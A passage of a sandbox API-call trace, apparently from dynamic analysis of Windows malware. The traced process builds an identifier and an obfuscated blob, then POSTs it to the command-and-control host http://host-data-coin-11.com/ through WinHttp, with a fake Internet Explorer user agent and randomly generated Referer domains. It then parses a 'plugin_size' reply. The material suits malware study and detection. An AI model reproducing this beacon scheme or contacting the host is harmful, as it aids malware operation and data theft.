Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x8d54df [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1e719cb3 [0202.476] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2646a860 [0202.476] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x150) returned 0x9a80190 [0202.476] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0202.476] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0202.476] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0202.476] lstrcatA (in: lpString1="", lpString2="5]nS(ub;r=N[?+$ygrFDI`D-Y5aFKVDMnys\"$P*wuvgoLaI4?^hKIg.dyGR\"/SRe-;D)xGE8p$brSy3wnj1binYatSd##0p^(\"uuReF#Jr&/oWVZev\"ew$F`'9fY)uMAPSFLA\\g5*'M^gx8\"2/Dh`2Y9LO1TZ%*D>&w'k;9\\/W>J>Mbtdc37I`%34aAL.i" | out: lpString1="5]nS(ub;r=N[?+$ygrFDI`D-Y5aFKVDMnys\"$P*wuvgoLaI4?^hKIg.dyGR\"/SRe-;D)xGE8p$brSy3wnj1binYatSd##0p^(\"uuReF#Jr&/oWVZev\"ew$F`'9fY)uMAPSFLA\\g5*'M^gx8\"2/Dh`2Y9LO1TZ%*D>&w'k;9\\/W>J>Mbtdc37I`%34aAL.i") returned="5]nS(ub;r=N[?+$ygrFDI`D-Y5aFKVDMnys\"$P*wuvgoLaI4?^hKIg.dyGR\"/SRe-;D)xGE8p$brSy3wnj1binYatSd##0p^(\"uuReF#Jr&/oWVZev\"ew$F`'9fY)uMAPSFLA\\g5*'M^gx8\"2/Dh`2Y9LO1TZ%*D>&w'k;9\\/W>J>Mbtdc37I`%34aAL.i" [0202.476] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10c) returned 0x9a802f0 [0202.476] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0202.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x97d2300, cbMultiByte=30, lpWideCharStr=0x9a802f0, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0202.477] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x75df4f8 | out: pProxyConfig=0x75df4f8) returned 1 [0202.500] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3ea9ba0 [0202.501] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x75df5b0 | out: lpUrlComponents=0x75df5b0) returned 1 [0202.501] WinHttpConnect (hSession=0x3ea9ba0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3faa0e0 [0202.502] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x9a80410 [0202.502] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x68) returned 0x9a80430 [0202.502] WinHttpOpenRequest (hConnect=0x3faa0e0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x3eeadd0 [0202.502] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x4e) returned 0x9a804a0 [0202.502] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10d) returned 0x9a80500 [0202.502] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ab81f05 [0202.502] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x9a80620 [0202.502] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x17) returned 0x9a80640 [0202.502] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x437d9364 [0202.502] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4bf85119 [0202.502] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6bc999d3 [0202.502] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x68b33c5a [0202.502] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xa04d861 [0202.502] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x45b89590 [0202.502] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b17e747 [0202.502] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4f4b7c2 [0202.502] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e073ee8 [0202.502] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x533f2c9 [0202.502] wsprintfW (in: param_1=0x9a80500, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://ociwqdpqt.com/") returned 43 [0202.503] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80640) returned 0x17 [0202.503] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80640) returned 1 [0202.503] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80620) returned 0x12 [0202.503] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80620) returned 1 [0202.503] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a804a0) returned 0x4e [0202.503] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a804a0) returned 1 [0202.503] WinHttpAddRequestHeaders (hRequest=0x3eeadd0, pwszHeaders="Accept: */*\r\nReferer: http://ociwqdpqt.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0202.503] WinHttpSendRequest (hRequest=0x3eeadd0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x9a80190*, dwOptionalLength=0x147, dwTotalLength=0x147, dwContext=0x0) returned 1 [0202.824] WinHttpReceiveResponse (hRequest=0x3eeadd0, lpReserved=0x0) returned 1 [0202.824] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x2800) returned 0x97d2350 [0202.824] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97d2350, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df668 | out: lpBuffer=0x97d2350*, lpdwNumberOfBytesRead=0x75df668*=0x18) returned 1 [0202.826] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d2350, Size=0x5000) returned 0x97d2350 [0202.826] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97d2368, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df668 | out: lpBuffer=0x97d2368*, lpdwNumberOfBytesRead=0x75df668*=0x0) returned 1 [0202.827] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0202.828] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2350) returned 1 [0202.829] WinHttpCloseHandle (hInternet=0x3eeadd0) returned 1 [0202.829] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80500) returned 0x10d [0202.829] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80500) returned 1 [0202.829] WinHttpCloseHandle (hInternet=0x3faa0e0) returned 1 [0202.829] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80430) returned 0x68 [0202.829] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80430) returned 1 [0202.829] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80410) returned 0x12 [0202.829] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80410) returned 1 [0202.829] WinHttpCloseHandle (hInternet=0x3ea9ba0) returned 1 [0202.829] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a802f0) returned 0x10c [0202.830] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a802f0) returned 1 [0202.830] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80080) returned 0x101 [0202.830] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80080) returned 1 [0202.830] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80190) returned 0x150 [0202.830] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80190) returned 1 [0202.830] lstrlenA (lpString="ä\x071|:|plugin_size=0") returned 19 [0202.830] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x15) returned 0x9a80080 [0202.830] lstrlenA (lpString="1|:|plugin_size=0") returned 17 [0202.830] lstrlenA (lpString="plugin_size") returned 11 [0202.830] atoi (_Str="0") returned 0 [0202.830] lstrlenA (lpString="1|:|plugin_size=0") returned 17 [0202.831] lstrlenA (lpString="|:|") returned 3 [0202.831] MapViewOfFile (hFileMappingObject=0x1380, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2660000 [0202.839] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0202.839] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x2660000) returned 0x0 [0202.876] atoi (_Str="1") returned 1 [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x36ba7b0c [0202.876] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x78) returned 0x9a800a0 [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x210b1a46 [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x747f149e [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xd35f09b [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x62de0f14 [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43ff9ef1 [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56980e89 [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40b4ee2e [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58aab00b [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7a841f05 [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x77185b82 [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x248dd1d3 [0202.876] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4921e746 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2bc208c4 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66355c80 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50e89f32 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6bd32ede [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x503f7eb5 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6d5a3d1c [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6b4e45f3 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x188528fa [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1ee3f76c [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x62b5d158 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2049908f [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x780261dd [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d9d4eec [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x22f67fc [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5e8a8995 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf585aff [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66791337 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x393e5cc5 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6303e0df [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf374786 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x653e63c [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4f8c576d [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x404bd4dd [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c923951 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66698010 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x38448849 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7648e239 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4f0828fe [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4f0138af [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x37bc84ee [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3bf15cd0 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x47f19f66 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x395e6965 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1d7396b8 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f2a9948 [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xa04836c [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1af4813e [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x46a31e2c [0202.877] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ff96c52 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ad7febb [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2af07323 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4fa4ce34 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6759241 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a40bb0f [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24711e7c [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x12b65bf1 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64e1dcf5 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x492dc1e3 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70d61d1a [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5caa50a6 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1a8b88ef [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7c94f1bc [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2f2d88cf [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x685ec6ff [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x520d44e7 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e1cf855 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4cc8c319 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5b8916fe [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xebe230e [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf0135bf [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6596afad [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7238aba6 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2ecc612f [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ac85dc3 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x53f89a27 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x339a61ad [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x469331be [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xa707fd6 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6b88f315 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15c5ff3d [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7eb8ef48 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x385330e3 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2628971b [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x381dee80 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2957dcd7 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xa268fc6 [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x35a12a6f [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x75de8bd [0202.878] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x55ed4562 [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78f5b9cd [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x681e767b [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x41f689ba [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x79610e83 [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x28a461d9 [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5851bcb4 [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1953aba0 [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7d8bc23f [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x602c80ed [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2810b70f [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4f108c97 [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5623854b [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x700bdb06 [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17d278a0 [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x77ad1cb6 [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe19cf8b [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d7d00d7 [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4fa7b3bc [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x76a188c5 [0202.879] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x19057b9a [0202.879] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0xc7) returned 0x9a80120 [0202.879] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0202.879] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0202.879] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0202.879] lstrcatA (in: lpString1="", lpString2="SOJI^>3v&C<#E]wONQPKKcP&U/t.<$fqavP2'BVEh[!QZy=[;UuXZ'p:3(Xj'[N;0r4T@9[bzK48z:E[337vx=x7" | out: lpString1="SOJI^>3v&C<#E]wONQPKKcP&U/t.<$fqavP2'BVEh[!QZy=[;UuXZ'p:3(Xj'[N;0r4T@9[bzK48z:E[337vx=x7") returned="SOJI^>3v&C<#E]wONQPKKcP&U/t.<$fqavP2'BVEh[!QZy=[;UuXZ'p:3(Xj'[N;0r4T@9[bzK48z:E[337vx=x7" [0202.879] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10c) returned 0x9a801f0 [0202.879] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0202.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x97d2300, cbMultiByte=30, lpWideCharStr=0x9a801f0, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0202.879] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x75df4f8 | out: pProxyConfig=0x75df4f8) returned 1 [0202.891] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3ea9ba0 [0202.892] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x75df5b0 | out: lpUrlComponents=0x75df5b0) returned 1 [0202.892] WinHttpConnect (hSession=0x3ea9ba0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3faa0e0 [0202.892] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x9a80310 [0202.892] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x68) returned 0x9a80330 [0202.892] WinHttpOpenRequest (hConnect=0x3faa0e0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x3eeadd0 [0202.892] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x4e) returned 0x9a803a0 [0202.892] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10d) returned 0x9a80400 [0202.892] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1cd5e771 [0202.892] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x9a80520 [0202.892] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x17) returned 0x9a80540 [0202.892] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x762e9add [0202.892] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x36e6d55f [0202.892] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x53e8cf56 [0202.892] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32a66da8 [0202.892] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x941f0a4 [0202.892] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71ea3853 [0202.892] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x799d79e1 [0202.892] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe78b5c5 [0202.892] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3cdeef0c [0202.892] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xde53abc [0202.892] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x34ebdd51 [0202.892] wsprintfW (in: param_1=0x9a80400, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://rixnbocxny.com/") returned 44 [0202.892] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80540) returned 0x17 [0202.893] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80540) returned 1 [0202.893] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80520) returned 0x12 [0202.893] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80520) returned 1 [0202.893] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a803a0) returned 0x4e [0202.893] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a803a0) returned 1 [0202.893] WinHttpAddRequestHeaders (hRequest=0x3eeadd0, pwszHeaders="Accept: */*\r\nReferer: http://rixnbocxny.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0202.893] WinHttpSendRequest (hRequest=0x3eeadd0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x9a80120*, dwOptionalLength=0xbe, dwTotalLength=0xbe, dwContext=0x0) returned 1 [0203.110] WinHttpReceiveResponse (hRequest=0x3eeadd0, lpReserved=0x0) returned 1 [0203.110] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x2800) returned 0x97d2350 [0203.110] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97d2350, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df668 | out: lpBuffer=0x97d2350*, lpdwNumberOfBytesRead=0x75df668*=0x46) returned 1 [0203.111] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, 